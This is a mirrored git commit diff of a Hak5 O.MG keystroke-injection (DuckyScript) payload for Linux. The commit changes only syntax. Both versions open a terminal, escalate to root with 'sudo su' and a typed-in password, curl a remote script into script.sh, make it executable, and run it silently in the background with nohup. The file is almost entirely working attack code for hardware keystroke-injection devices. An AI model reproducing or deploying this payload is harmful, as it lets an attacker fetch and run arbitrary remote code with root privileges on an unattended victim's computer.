mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
cc7ea30a34
commit
738b50e6bd
|
@ -22,20 +22,16 @@ REM REQUIRED - sudo Password
|
|||
DEFINE SUDO-PSWD example
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
CTRL ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### Permission ####
|
||||
|
||||
REM This section of sudo time depends by the computer power on which it runs.
|
||||
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
|
||||
|
||||
STRING sudo su
|
||||
ENTER
|
||||
STRINGLN sudo su
|
||||
DELAY 500
|
||||
STRING SUDO-PSWD
|
||||
ENTER
|
||||
STRINGLN SUDO-PSWD
|
||||
REM DELAY Based On Computer Power
|
||||
DELAY 5000
|
||||
|
||||
|
@ -45,20 +41,12 @@ REM ENTER
|
|||
REM DELAY Based On Internet Power
|
||||
REM DELAY 5000
|
||||
|
||||
|
||||
REM #### Script ####
|
||||
|
||||
|
||||
STRING curl
|
||||
STRING SCRIPT-SH-LINK
|
||||
STRING > script.sh
|
||||
ENTER
|
||||
STRINGLN curl #SCRIPT-SH-LINK > script.sh
|
||||
REM DELAY Based On Internet Power
|
||||
DELAY 4000
|
||||
|
||||
STRING chmod +x script.sh
|
||||
ENTER
|
||||
STRINGLN chmod +x script.sh
|
||||
DELAY 500
|
||||
|
||||
STRING nohup ./script.sh > /dev/null 2>&1 & exit
|
||||
ENTER
|
||||
STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
|
||||
|
|
Loading…
Reference in New Issue